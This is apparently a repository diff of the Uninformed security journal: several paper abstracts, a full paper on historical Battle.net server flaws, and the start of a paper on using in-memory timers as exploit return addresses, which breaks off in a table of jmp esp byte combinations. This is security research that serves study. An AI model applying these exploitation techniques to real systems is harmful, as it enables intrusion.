Using dual-mappings to evade automated unpackers
skape
Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.
pdf | html | txt
Exploitation Technology
Analyzing local privilege escalations in win32k
mxatone
This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
pdf | html | txt
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
H D Moore
This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.
pdf | html | txt

453
uninformed/2.1.txt Normal file
View File

@ -0,0 +1,453 @@
Inside Blizzard: Battle.net
Skywing
skywinguninformed@valhallalegends.com
Last modified: 8/31/2005
1) Foreword
Abstract: This paper intends to describe a variety of the problems Blizzard
Entertainment has encountered from a practical standpoint through their
implementation of the large-scale online game matchmaking and chat service,
Battle.net. The paper provides some background historical information into
the design and purpose of Battle.net and continues on to discuss a variety of
flaws that have been observed in the implementation of the system. Readers
should come away with a better understanding of problems that can be easily
introduced in designing a matchmaking/chat system to operate on such a large
scale in addition to some of the serious security-related consequences of not
performing proper parameter validation of untrusted clients.
2) Introduction
First, a bit of historical and background information, leading up to the
present day. Battle.net is an online matchmaking service that allows players
to set up online games with other players. It is quite possibly the oldest
and largest system of it's kind currently in existence (launched in 1997).
The basic services provided by Battle.net are game matchmaking and chat. The
matchmaking system allows one to create and join games with little or no prior
configuration required (other than picking game parameters, such as a map to
play on, or so-forth). The chat system is similar to a stripped-down version
of Internet Relay Chat. The primary differences between IRC and Battle.net
(for the purposes of the chat system) are that Battle.net only allows a user
to be present in one chat channel at once, and many of the channel parameters
that IRC users might be familiar with (maximum number of users in the channel,
who has channel operator privileges) are fixed to well-defined values by the
server.
Battle.net supports a wide variety of Blizzard games, including Diablo,
Starcraft, Warcraft II: Battle.net Edition, Diablo II, and Warcraft III. In
addition, there are shareware versions of Diablo and Starcraft that are
supported on Battle.net, as well as optional expansions for Diablo II,
Starcraft, and Warcraft III. All of these games share a common binary
communication protocol that has evolved over the past 8 years, although
different games have differing capabilities with respect to the protocol.
In some cases, this is due to differing requirements for the game clients, but
usually this is simply due to the older programs not being updated as
frequently as newer versions. In short, there are a number of different
dialects of the Battle.net binary protocol that are used by the various
supported products, all at the same time. In addition to supporting an
undocumented binary protocol, Battle.net has for some time now supported a
text-based protocol (the ``Chat Gateway'', as officialy documented). This
protocol supports a limited subset of the features available to clients using
the full game protocol. In particular, it lacks support for capabilities such
as account creation and management.
Both of these protocols are now fairly well understood and documented certain
persons outside of Blizzard. Although the text-based protocol is documented
and fairly stable, the limitations inherent in it make it undesirable for many
uses. Furthermore, in order to help stem the flood of spam on Battle.net,
Blizzard changed their server software to prevent clients using the text-based
protocol from entering all but a few pre-defined chat channels. As a result
of this, many developers have reverse engineered (or more commonly, used the
work of those who came before them) the Battle.net binary protocol and written
their own "emulator" clients for various purposes (typically as a better
alternative to the limited chat facilities provided by Blizzard's game
clients). These clients emulate the behavior of a particular Blizzard game
program in order to trick Battle.net into providing the services typically
only offered to the game clients, hence the name ``emulator client''. Most of
these clients area referred to as ``emulator bots'' or ``emubots'' by their
developers, and the Battle.net community in general. In fact, there are also
partially compliant server implementations that implement the server-side chat
and matchmaking logic supported by Battle.net to varying degrees of accuracy.
One can today download a third party server that emulates the Battle.net
protocol, and a third party client that emulates a Blizzard client supporting
the Battle.net protocol, and have the two inter-operate.
3) Battle.net issues
By virtue of supporting so many different game clients (at present, there are
11 distinct Blizzard-supported programs that connect to Battle.net), Blizzard
has a sizable version-control problem. In fact, this problem is compounded by
several issues.
First, many client game patches add or change the protocol in significant
ways. For instance, the notion of password-protected, persistent player
accounts was not originally even designed into Battle.net, and was added at a
later date via a client patch (and server-side modifications).
On top of that, many clients also have very significant differences in feature
support. To give an example, for many years Diablo and Diablo Shareware were
both supported on Battle.net concurrently while Diablo supported user accounts
and the shareware version did not. As one can imagine, this sort of thing can
give rise to a great many problems. The version control and update mechanism
is not separate from the rest of the protocol. Indeed, the same server, and
the same connection, are used for version control, but a different connection
to the same server is used for the transfer of client patches. As a result,
any compliant Battle.net server is required to support not only the current
Battle.net protocol version that is in use by the current patch level of every
existing client, but it must also support the first few messages used by every
single version of every single Battle.net client ever released, or at least
until the version checking mechanism can be invoked to distribute a new
version (which is not the first task that occurs in some older iterations of
the protocol).
To make matters worse, there is now a proliferation of third party clients
using the Battle.net protocol (to varying degrees of accuracy compared to the
Blizzard game clients they attempt to emulate) in use on Battle.net today.
This began sometime in mid-1999 when a program called ``NBBot'',authored by
Andreas Hansson, who often goes by the handle ``Adron'', entered widespread
distribution, though this was not the intent of the author. NBBot was the
first third party client to emulate the Battle.net protocol to an extent that
allowed it to masquerade as a game client. Several years later, the source
code for this program was inadvertently released to wide-spread public
distribution, which kicked off large-scale development of third party
Battle.net protocol clients by a number of authors.
Despite all of these challenges, Blizzard has managed to keep Battle.net up
and running for nearly a decade now, and claims over a million active users.
However, the road leading up to the present day has not been ``clear sailing''
for Blizzard. This leads us into some of the specific problems facing
Battle.net leading up until the present day. One of the major classes of
problems encountered by Blizzard as Battle.net has grown is that it was (in
the author's opinion) simply not designed to support the circumstances in
which it eventually ended up being used. This is evident in a variety of
events that have occurred over the past few years:
- The addition of persistent player accounts to the system.
- The addition of the text-based chat protocol to the system.
- Significant changes to the backend architecture utilized by
Battle.net.
Although it is difficult to provide exact details of these changes, having not
worked at Blizzard, many of them can be inferred.
3.1) Network issues
Battle.net was originally setup as a small number of linked servers placed at
various strategic geographical locations. They were ``linked'' in the sense
that players on one server could interact with players on a different server
as seamlessly as with players connected to the same server. This architecture
eventually proved unsupportable, as increasing usage of Battle.net led to the
common occurrence of "server splits", in which one or more servers would be
unable to keep up with the rest of the network and become temporarily
disconnected.
Eventually, the system was split into two separate networks (each starting
with a copy of all account and player data present at the time of the
division): The Asian network, and United States and European network. Each
network was comprised of a number of different servers that players could
connect to in an optimized fashion based on server response time.
Some time later, even this system proved untenable. The network was once
again permanently fragmented, this time splitting the United States and
European network into three subnetworks. This is the topology retained today,
with the networks designated ``USEast'', ``USWest'', ``Europe'', ``Asia''. It
is believed that all servers in a server network (also referred to as a
``cluster'' or ``gateway'') are, at present, located at the same physical
hosting facility on a high-speed LAN.
As new game requirements came about, a new architecture for Diablo II and
Warcraft III as required. In these cases, games are hosted on
Blizzard-operated servers and not on client machines in order to make them
more resilient from attempts to hack the game to gain an unfair advantage.
There are significant differences to how this is implemented for Diablo II and
Warcraft III, and it is not used for certain types of games in Warcraft III .
This resulted in a significant change to the way the service performs it's
primary function, that is, game matchmaking.
3.2) Client/Server issues
Aside from the basic network design issues, other problems have arisen from
the fact that Blizzard did not expect, or intend for, third party programs to
use its Battle.net protocol. As a result, proper validation has not always
been in place for certain conditions that would not be generated through the
Blizzard client software.
As mentioned earlier, many developers eventually turned to the using the
Battle.net protocol directly as opposed to the text-based protocol in order to
circumvent certain limitations in the text-based protocol. There are a number
of reasons for this. Historically, clients utilizing the Battle.net protocol
have been able to enter channels that are already full (private channels on
Battle.net have a limit of 40 users, normally), and have been able to perform
various account management functions (such as creating accounts, changing
passwords, managing user profile information, and so-forth) that are not
doable through the text-based protocol.
In addition to having access to extended protocol-level functionality, clients
using the Battle.net protocol are permitted to open up to eight connections to
a single Battle.net network per IP address (as opposed to the text-based
protocol, which only allows a single connection per IP address). This limit
was originally four connections per IP address, and was raised after NATs,
particularly in cyber cafes, gained popularity.
This was particularly attractive to a number of persons on Battle.net who used
third-party chat clients for a variety of reasons. The primary reason was
generally the same ``channel war'' phenomenon that has historically plagued
IRC was also rather prevalent on Battle.net, and being able to field a large
number of clients per IP address was seen as a significant advantage.
Due to the prevalence of ``channel wars'' on Battle.net, artificially large
numbers of third-party clients utilizing the Battle.net protocol came into
use. Although it is difficult to estimate the exact number of users of such
clients, the author has observed upwards of several thousand being logged on
to the service at once.
The development and usage of said third party clients has resulted in the
discovery of a number of other issues with Battle.net. While most of the
issues covered here are either already fixed or relatively minor, there is
still value in discussing them.
3.2.1) Client connection limits
Through the use of certain messages in the Battle.net protocol, it is possible
to enter a channel beyond the normal 40 user limit. This was due to the fact
that the method a game client would use to return to a chat channel after
leaving a game would not properly check the user count. After miscreants
exploited this vulnerability to put thousands of users into one channel, which
subsequently lead to server crashes, Blizzard finally fixed this
vulnerability.
3.2.2) Chat message server overflow
The server software often assumed that the client would only perform 'sane'
actions, and one of these assumptions dealt with how long of a chat message a
client could send. The server apparently copied a chat message indicated by a
Battle.net protocol client into a fixed 512-byte buffer without proper length
checking, such that a client could crash a server by sending a long enough
message. Due to the fact that Blizzard's server binaries are not publicly
available, it would not have been easy to exploit this flaw to run arbitrary
code on the server. This serious vulnerability was fixed within a day of
being reported.
3.2.3) Client authentication
Aside from general sanity checks, Blizzard also has had some issues relating
to authentication. Blizzard currently has two systems in use for user account
password authentication. In order to create a third party client, these
systems had to be understood and third party implementations reduced. This
has revealed several flaws in their implementation.
The first system Blizzard utilizes is challenge-response system that uses a
SHA-1 hash of the client's password. The game client implementation of this
system lowercases the entire password string before hashing it, significantly
reducing password security. (A third party client could opt not to do this,
and as such create an account that is impossible to log on to through the
official Blizzard game clients or the text-based protocol. The text-based
protocol sends a user's password in cleartext, after which the server
lowercases the password and internally compares a hash of it with the account
in question's password in a database.) However, a more serious security
problem remains: in SHA-1, there are a number of bit rotate left (``ROL'')
operations. The Blizzard programmer responsible for implementing this
apparently switched the two parameters in every call to ROL. That is, if
there was a ``define ROL(a, b) (...)'' macro, the programmer swapped the two
arguments. This drastically reduces the security of Battle.net password
hashes, as most of the data being hashed ends up being zero bits. Because of
the problem of incompatibility with previously created accounts, this system
is still in use today.
The second system Blizzard utilizes is one based off of SRP (Secure Remote
Password, see http://srp.stanford.edu). Only Warcraft III and it's expansion
use this system for password authentication. This product has it's own
account namespace on Battle.net, so that there are no backwards compatibility
issues with the older ``broken SHA-1'' method. It is worth noting that
Warcraft III clients and older clients can still communicate via chat, however
- the server imposes a namespace decoration to client account names for
communication between namespaces, such that a client logged on as Warcraft III
would see a user ``User'' logged on as Starcraft on the USEast Battle.net
network as ``User@USEast''. However, this system is also flawed, albeit less
severely. In particular, the endian-ness of calculations is reversed, but
this is not properly accounted for in some parts of the implementation, such
that some operations expecting to remove trailing zero bits instead remove
leading zero bits after converting a large integer to a flat binary buffer.
There is a second flaw, as well, although it does not negatively impact the
security of the client: In some of the conversions from big numbers to flat
buffers, the server does not properly zero out bytes if the big number does
not occupy 32 non-zero bytes, and instead leaves uninitialized data in them.
The result is that some authentication attempts will randomly fail. As far as
the author knows, this bug is still present in Battle.net.
3.2.4) Client namespace spoofing
With the release of Warcraft III, a separate account namespace was provided
for users of that product, as mentioned above. The server internally keeps
track of a user's account name as ``xusername'', where x is a digit specifying
an alternate namespace (the only currently known namespace designation is 'w',
for Warcraft III). This is known due to a message that exposes the internal
unique name for a user to protocol clients. While the character '' has never
been permitted in account names, if a user logs on to the same account more
than once, they are assigned a unique name of the format 'accountnameserial',
where 'serial' is a number that is incremented according to how many duplicate
logons of the same account there are. Due to a lack of parameter checking in
the account creation process, it was at one time possible to create
accounts,via a third party client, that were one character long (all of the
official game clients do not allow the user to do this). For some time, such
accounts confused the server into thinking that a user was actually on a
different (non-existent) namespace, and thus allowed a user who logged on to a
single character account more than once to become impossible to 'target' via
any of the user management functions. For example, such a user could not be
sent a private message, ignored, banned or kicked from a channel, or otherwise
affected by any other commands that operate on a specific user. This was, of
course, frequently abused to spam individuals with the victims being unable to
stop the spammer (or even ignore them!). This problem has been fixed in the
current server version.
3.2.5) Username collisions
As referred to in the previuos sub-section, for some time the server allowed
Diablo Shareware clients. These clients did not log on to accounts, and
instead simply assigned themselves a username. Normal procedures were
followed if the username was already in use, which involved appending a serial
number to the end to make a unique name. Besides the obvious problem of being
able to impersonate someone to a user who was not clever enough to check what
game type one was logged on as, this creates an additional vulnerability that
was heavily exploited in ``channel wars''. If a server became split from the
rest of the network due to load, one could log on to that server using Diablo
Shareware, and pick the same name as someone logged on to the rest of the
network using a different game type. When the server split was resolved, the
server would notice that there were now two users with the same unique name,
and disconnect both of them with the ``Duplicate username detected.'' message
(this is synonymous with the ``colliding'' exploits of old that used to plague
IRC). This could be used to force users offline any time a server split
occurred. Being able to do so was desirable in the sense that there could
normally only be one channel operator in a channel at a time (barring server
splits, which could be used to create a second operator if the channel was
entirely emptied and then recreated on the split server). When that operator
left, the next person in line would be gifted with operator permissions
(unless the operator had explicitly 'designated' a new heir for operator
permissions). So, one could ``take over'' a channel by systematically
disconnecting those ``ahead of'' one's client in a channel. A channel is
ordered by a user's age in the channel.
3.2.6) Server de-synchronization
At one time, a race condition such that if a malicious user were to log on to
two connected (i.e. not-split) servers at the same time, the two servers would
cease to communicate with another, causing a server split to occur. It is
difficult to provide an exact explanation for why this would occur given the
collision elimination mechanism described above for users that are logged on
with the same unique name, but it is assumed that in the process of
synchronizing a new user between servers, there is a period of time where that
a second server can also attempt to synchronize the same user and cause one of
the servers to get into a invalid state. According to observations, this
invalid state would eventually be resolved automatically, usually after 10-15
minutes.
3.2.7) Seeing invisible users
Battle.net administrators have the ability to become invisible to normal
users. However, until recently, this was flawed in that the server would
expose the existence of an invisible user to regular users during certain
operations. In particular, if one ignores or unignores a user, the server
will re-send the state of all users that are ignored or unignored in the
current channel. Before this bug was fixed, this list included any invisible
users. It is worth noting that the official game clients will ignore any
unknown users returned in the state update message, so this vulnerability
could only be utilized by a third party client.
3.2.8) Administrative command discovery
Originally, Battle.net would provide no acknowledgement if one issued an
unrecognized chat command ("slash-command"). Blizzard later changed the
server software to respond with an error message if a user sent an unknown
command, but the server originally silently ignored the command if the user
issued a privileged (administrator-only) command. This allowed end users to
discover the names of various commands accessible to system administrators.
3.2.9) Gaining administrative privileges
Due to an oversight in the way administrator permissions are assigned to
Battle.net accounts, it was at one time possible to overwrite the account of
an administrator with a new account and keep the special permissions otherwise
associated with the account. (An account can be overwritten like so if it has
not been accessed in 90 days). This could have very nearly resulted in a
disaster for Blizzard, had a more malicious user discovered this vulnerability
and abused such privileges.
3.2.10) Obtaining passwords
Eventually, Blizzard implemented a password recovery mechanism whereby one
could associate an e-mail address with an account, and request a password
change through the Battle.net protocol for an account at logon time. This
would result in an e-mail being dispatched to the registered address. If the
user then replied to the mail as instructed, they would be automatically
mailed back with a new account password. Unfortunately, as originally
implemented, this system did not properly perform validation on the
confirmation mail that the user was required to send. In particular, if a
malicious user created an account ``victim'' on one Battle.net network, such
as the Asian network, and then requested a password reset for that account,
they could alter the return email slightly and actually reset the password for
the account ``victim'' on a different Battle.net network, such as the USEast
network. This exploit was actually publicly disclosed and saw over a day of
heavy abuse before Blizzard managed to patch it.
4) Battle.net server emulation
Blizzard 'declared war' on the programmers of servers that implement the
Battle.net protocol some time ago when they took the developers of ``bnetd''
to court. As of Warcraft III, they have taken active measures to make life
difficult for developers programming third party Battle.net-compatible
servers. In particular, two actions are of note:
During the Warcraft III Expansion beta test, Blizzard implemented an
encryption scheme for the Battle.net protocol (this was only used during the
beta test and not on production Battle.net). This consisted of using the RC4
cipher to encrypt messages send and received from the server. The tricky part
was that Blizzard had hardcoded constants that were encrypted using the cipher
state, but never actually sent on the wire (these constants were different for
each message). This made implementing a server difficult, as one had to find
each magic constant. Unfortunately, Blizzard neglected to consider the policy
of someone releasing a hacked version of the client that zeroed the RC4
initialization parameters, such that the entire encrypted stream became
plaintext.
After several patches, Blizzard implemented a scheme by which a Warcraft III
client could verify that it was indeed connecting to a genuine Blizzard
Battle.net server. This scheme worked by having the Battle.net server sign
it's IP address and send the resulting signature to the client, which would
refuse to log on if the server's IP address did not match the signature.
However, in the original implementation, the game client only checked the
first four bytes of the signed data, and did not validate the remaining
(normally zero) 124 bytes. This allows one to easily brute-force a signature
that has a designed IP address, as one only has to check 32 bits of possible
signatures at most to find it.
5) Conclusion
Developing a platform to support a diverse set of requirements such as
Battle.net is certainly no easy task. Though the original design could have
perhaps been improved upon, it is the author's opinion that given what they
had to work with, Blizzard did a reasonable job of ensuring that the service
they set out to create stood the test of time, especially considering that
support for all the future features of their later game clients could not have
been predicted at the time the system was originally created. Nevertheless, it
is the author's opinion that a system designed where clients are untrusted and
all actions performed by them are subject to full validation would have been
far more secure from the start, without any of the various problems Blizzard
has encountered over the years.

971
uninformed/2.2.txt Normal file
View File

@ -0,0 +1,971 @@
Temporal Return Addresses: Exploitation Chronomancy
skape
mmiller@hick.org
Last modified: 8/6/2005
1) Foreword
Abstract: Nearly all existing exploitation vectors depend on some knowledge of
a process' address space prior to an attack in order to gain meaningful
control of execution flow. In cases where this is necessary, exploit authors
generally make use of static addresses that may or may not be portable between
various operating system and application revisions. This fact can make
exploits unreliable depending on how well researched the static addresses were
at the time that the exploit was implemented. In some cases, though, it may
be possible to predict and make use of certain addresses in memory that do not
have static contents. This document introduces the concept of temporal
addresses and describes how they can be used, under certain circumstances, to
make exploitation more reliable.
Disclaimer: This document was written in the interest of education. The
author cannot be held responsible for how the topics discussed in this
document are applied.
Thanks: The author would like to thank H D Moore, spoonm, thief, jhind,
johnycsh, vlad902, warlord, trew, vax, uninformed, and all the friends of
nologin!
With that, on with the show...
2) Introduction
A common impediment to the implementation of portable and reliable exploits is
the location of a return address. It is often required that a specific
instruction, such as a jmp esp, be located at a predictable location in memory
so that control flow can be redirected into an attacker controlled buffer.
This scenario is more common on Windows, but applicable scenarios exist on
UNIX derivatives as well. Many times, though, the locations of the
instructions will vary between individual versions of an operating system,
thus limiting an exploit to a set of version-specific targets that may or may
not be directly determinable at attack time. In order to make an exploit
independent of, or at least less dependent on, a target's operating system
version, a shift in focus becomes necessary.
Through the blur of rhyme and reason an attacker might focus and realize that
not all viable return addresses will exist indeterminably in a target process'
address space. In fact, viable return addresses can be found in a transient
state throughout the course of a program's execution. For instance, a pointer
might be stored at a location in memory that happens to contain a viable two
byte instruction somewhere within the bytes that compose the pointer's
address. Alternatively, an integer value somewhere in memory could be
initialized to a value that is equivalent to a viable instruction. In both
cases, though, the contents and locations of the values will almost certainly
be volatile and unpredictable, thus making them unsuitable for use as return
addresses.
Fortunately, however, there does exist at least one condition that can lend
itself well to portable exploitation that is bounded not by the operating
system version the target is running on, but instead by a defined window of
time. In a condition such as this, a timer of some sort must exist at a
predictable location in memory that is known to be updated at a constant time
interval, such as every second. The location in memory that the timer resides
at is known as a temporal address. On top of this, it is also important for
the attacker determine the scale of measurement the timer is operating on,
such as whether or not it's measured in epoch time (from 1970 or 1601) or if
it's simply acting as a counter. With these three elements identified, an
attacker can attempt to predict the periods of time where a useful instruction
can be found in the bytes that compose the future state of any timer in
memory.
To help illustrate this, suppose an attacker is attempting to find a reliable
location of a jmp edi instruction. The attacker knows that the program being
exploited has a timer that holds the number of seconds since Jan. 1, 1970 at a
predictable location in memory. By doing some analysis, the attacker could
determine that on Wednesday July 27th, 2005 at 3:39:12PM CDT, a jmp edi could
be found within any four byte timer that stores the number of seconds since
1970. The window of opportunity, however, would only last for 4 minutes and 16
seconds assuming the timer is updated every second.
By accounting for timing as a factor in the selection of return addresses, an
attacker can be afforded options beyond those normally seen when the address
space of a process is viewed as unchanging over time. In that light, this
document is broken into three portions. First, the steps needed to find,
analyze, and make use of temporal addresses will be explained. Second,
upcoming viable opcode windows will be shown and explained along with methods
that can be used to determine target time information prior to exploitation.
Finally, examples of commonly occurring temporal addresses on Windows NT+ will
be described and analyzed to provide real world examples of the subject of
this document.
Before starting, though, it is important to understand some of the terminology
that will be used, or perhaps abused, in the interest of conveying the
concepts. The term temporal address is used to describe a location in memory
that contains a timer of some sort. The term opcode is used interchangeably
with the term instruction to convey the set of viable bytes that could
partially compose a given temporal state. The term update period is used to
describe the amount of time that it takes for the contents of a temporal
address to change. Finally, the term scale is used to describe the unit of
measure for a given temporal address.
3) Locating Temporal Addresses
In order to make use of temporal addresses it is first necessary to devise a
method of locating them. To begin this search it is necessary that one
understand the attributes of a temporal address. All temporal addresses are
defined as storing a time-associated counter that increments at a constant
interval. For instance, an example would be a location in memory that stores
the number of seconds since Jan. 1, 1970 that is incremented every second. As
a more concrete definition, all time-associated counters found in memory are
represented in terms of a scale (the unit of measure), an interval or period
(how often they are updated), and have a maximum storage capacity (variable
size). If any these parts are unknown or variant for a given memory location,
it is impossible for an attacker to consistently leverage it for use as
time-bounded return address because of the inability to predict the byte
values at the location for a given period of time.
With the three major components of a temporal address identified (scale,
period, and capacity), a program can be written to search through a process'
address space with the goal of identifying regions of memory that are updated
at a constant period. From there, a scale and capacity can be inferred based
on an arbitrarily complex set of heuristics, the simplest of which can
identify regions that are storing epoch time. It's important to note, though,
that not all temporal addresses will have a scale that is measured as an
absolute time period. Instead, a temporal address may simply store the number
of seconds that have passed since the start of execution, among other
scenarios. These temporal addresses are described as having a scale that is
simply equivalent to their period and are for that reason referred to as
counters.
To illustrate the feasibility of such a program, the author has implemented an
algorithm that should be conceptually portable to all platforms, though the
implementation itself is limited to Windows NT+. The approach taken by the
author, at a high level, is to poll a process' address space multiple times
with the intention of analyzing changes to the address space over time. In
order to reduce the amount of memory that must be polled, the program is also
designed to skip over regions that are backed against an image file or are
otherwise inaccessible.
To accomplish this task, each polling cycle is designed to be separated by a
constant (or nearly constant) time interval, such as 5 seconds. By increasing
the interval between polling cycles the program can detect temporal addresses
that have a larger update period. The granularity of this period of time is
measured in nanoseconds in order to support high resolution timers that may
exist within the target process' address space. This allows the program to
detect timers measured in nanoseconds, microseconds, milliseconds, and
seconds. The purpose of the delay between polling cycles is to give temporal
address candidates the ability to complete one or more update periods. As
each polling cycle occurs, the program reads the contents of the target
process' address space for a given region and caches it locally within the
scanning process. This is necessary for the next phase.
After at least two polling cycles have completed, the program can compare the
cached memory region differences between the most recent view of the target
process' address space and the previous view. This is accomplished by walking
through the contents of each cached memory region in four byte increments to
see if there is any difference between the two views. If a temporal address
exists, the contents of a the two views should have a difference that is no
larger than the maximum period of time that occurred between the two polling
cycles. It's important to remember that the maximum period can be conveyed
down to nanosecond granularity. For instance, if the polling cycle period was
5 seconds, any portion of memory that changed by more than 5 seconds, 5000
milliseconds, or 5000000 microseconds is obviously not a temporal address
candidate. To that point, any region of memory that didn't change at all is
also most likely not a temporal address candidate, though it is possible that
the region of memory simply has an update period that is longer than the
polling cycle.
Once a memory location is identified that has a difference between the two
views that is within or equal to the polling cycle period, the next step of
analysis can begin. It's perfectly possible for memory locations that meet
this requirement to not actually be timers, so further analysis is necessary
to weed them out. At this point, though, memory locations such as these can
be referred to as temporal address candidates. The next step is to attempt to
determine the period of the temporal address candidate. This is accomplished
by some rather silly, but functional, logic.
First, the delta between the polling cycles is calculated down to nanosecond
granularity. In a best case scenario, the granularity of a polling cycle that
is spaced apart by 5 seconds will be 5000000000 nanoseconds. It's not safe to
assume this constant though, as thread scheduling and other non-constant
parameters can affect the delta between polling cycles for a given memory
region. The next step is to iteratively compare the difference between the
two views to the current delta to see if the difference is greater than or
equal to the current delta. If it is, it can be assumed that the difference
is within the current unit of measure. If it's not, the current delta should
be divided by 10 to progress to the next unit of measure. When broken down,
the progressive transition in units of measurement is described in figure 3.1.
Delta Measurement
---------------------------
1000000000 Nanoseconds
100000000 10 Nanoseconds
10000000 100 Nanoseconds
1000000 Microseconds
100000 10 Microseconds
10000 100 Microseconds
1000 Milliseconds
100 10 Milliseconds
10 100 Milliseconds
1 Seconds
Figure 3.1: Delta measurement reductions
Once a unit of measure for the update period is identified, the difference is
divided by the current delta to produce the update period for a given temporal
address candidate. For example, if the difference was 5 and the current delta
was 5, the update period for the temporal address candidate would be 1 second
(5 updates over the course of 5 seconds). With the update period identified,
the next step is to attempt to determine the storage capacity of the temporal
address candidate.
In this case, the author chose to take a shortcut, though there are most
certainly better approaches that could be taken given sufficient interest.
The author chose to assume that if the update period for a temporal address
candidate was measured in nanoseconds, then it was almost certainly at least
the size of a 64-bit integer (8 bytes on x86). On the other hand, all other
update periods were assumed to imply a 32-bit integer (4 bytes on x86).
With the temporal address candidate's storage capacity identified in terms of
bytes, the next step is to identify the scale that the temporal address may be
conveying (the timer's unit of measure). To accomplish this, the program
calculates the number of seconds since 1970 and 1601 between the current time
minus at least equal the polling cycle period and the current time itself.
The temporal address candidate's current value (as stored in memory) is then
converted to seconds using the determined update period and then compared
against the two epoch time ranges. If the candidate's converted current value
is within either epoch time range then it can most likely be assumed that the
temporal address candidates's scale is measured from epoch time, either from
1970 or 1601 depending on the range it was within. While this sort of
comparison is rather simple, any other arbitrarily complex set of logic could
be put into place to detect other types of time scales. In the event that
none of the logic matches, the temporal address candidate is deemed to simply
have a scale of a counter (as defined previously in this chapter).
Finally, with the period, scale, and capacity for the temporal address
candidate identified, the only thing left is to check to see if the three
components are equivalent to previously collected components for the given
temporal address candidate. If they differ in orders of magnitude then it is
probably safe to assume that the candidate is not actually a temporal address.
On the other, consistent components between polling cycles for a temporal
address candidate are almost a sure sign that it is indeed a temporal address.
When everything is said and done, the program should collect every temporal
address in the target process that has an update period less than or equal to
the polling cycle period. It should also have determined the scale and size
of the temporal address. When run on Windows against a program that is
storing the current epoch time since 1970 in seconds in a variable every
second, the following output is displayed:
C:\>telescope 2620
[*] Attaching to process 2620 (5 polling cycles)...
[*] Polling address space........
Temporal address locations:
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
This output tells us that the address of the variable that is storing the
epoch time since 1970 can be found at 0x0012FF7C and has an update period of
one second. The other things that were found will be discussed later in this
document.
3.1) Determining Per-byte Durations
Once the update period and size of a temporal address have been determined, it
is possible to calculate the amount of time it takes to change each byte
position in the temporal address. For instance, if a four byte temporal
address with an update period of 1 second were found in memory, the first byte
(or LSB) would change once every second, the second byte would change once
every 256 seconds, the third byte would change once every 65536 seconds, and
the fourth byte would change once every 16777216 seconds. The reason these
properties are exhibited is because each byte position has 256 possibilities
(0x00 to 0xff inclusive). This means that each byte position increases in
duration by 256 to a given power. This can be described as shown in figure
3.2. Let x equal the byte index starting at zero for the LSB.
duration(x) = 256 ^ x
Figure 3.2: Period independent byte durations
The next step to take after determining period-specific byte durations is to
convert the durations to a measure more aptly accessible assuming a period
that is more granular than a second. For instance, figure shows that if each
byte duration is measured in 100 nanosecond intervals for an 8 byte temporal
address, a conversion can be applied to convert from 100 nanosecond intervals
for a byte duration to seconds.
tosec(x) = duration(x)/107
Figure 3.3: 100 nanosecond byte durations to seconds
This phase is especially important when it comes to calculating viable opcode
windows because it is necessary to know for how long a viable opcode will
exist which is directly dependent on the direction of the opcode byte closest
to the LSB. This will be discussed in more detail in chapter 4.
4) Calculating Viable Opcode Windows
Once a set of temporal addresses has been located, the next logical step is to
attempt to calculate the windows of time that one or more viable opcodes can
be found within the bytes of the temporal address. It is also just as
important to calculate the duration of each byte within the temporal address.
This is the type of information that is required in order to determine when a
portion of a temporal address can be used as a return address for an exploit.
The approach taken to accomplish this is to make use of the equations provided
in the previous chapter for calculating the number of seconds it takes for
each byte to change based on the update period for a given temporal address.
By using the tosec function for each byte index, a table can be created as
illustrated in figure 4.1 for a 100nanosecond 8 byte timer.
Byte Index Seconds (ext)
------------------------
0 0 (zero)
1 0 (zero)
2 0 (zero)
3 1 (1 sec)
4 429 (7 mins 9 secs)
5 109951 (1 day 6 hours 32 mins 31 secs)
6 28147497 (325 days 18 hours 44 mins 57 secs)
7 7205759403 (228 years 179 days 23 hours 50 mins 3 secs)
Figure 4.1: 8 byte 100ns per-byte durations in seconds
This shows that any opcodes starting at byte index 4 will have a 7 minute and
9 second window of time. The only thing left to do is figure out when to
strike.
5) Picking the Time to Strike
The time to attack is entirely dependent on both the update period of the
temporal address and its scale. In most cases, temporal addresses that have a
scale that is relative to an arbitrary date (such as 1970 or 1601) are the
most useful because they can be predicted or determined with some degree of
certainty. Regardless, a generalized approach can be used to determine
projected time intervals where useful opcodes will occur.
To do this, it is first necessary to identify the set of instructions that
could be useful for a given exploit, such as a jmp esp. Once identified, the
next step is to break the instructions down into their raw opcodes, such as
0xff 0xe4 for jmp esp. After all the raw opcodes have been collected, it is
then necessary to begin calculating the projected time intervals that the
bytes will occur at. The method used to accomplish this is rather simple.
First, a starting byte index must be determined in terms of the lowest
acceptable window of time that an exploit can use. In the case of a 100
nanosecond timer, the best byte index to start at would be byte index 4
considering all previous indexes have a duration of less than or equal to one
second. The bytes that occur at index 4 have a 7 minute and 9 second
duration, thus making them feasible for use. With the starting byte index
determined, the next step is to create permutations of all subsequent opcode
byte combinations. In simpler terms, this would mean producing all of the
possible byte value combinations that contain the raw opcodes of a given
instruction at a byte index equal to or greater than the starting byte index.
To help visualize this, figure 5.1 provides a small sample of jmp esp byte
combinations in relation to a 100 nanosecond timer.
Byte combinations
-----------------------
00 00 00 00 ff e4 00 00
00 00 00 00 ff e4 01 00
00 00 00 00 ff e4 02 00
...
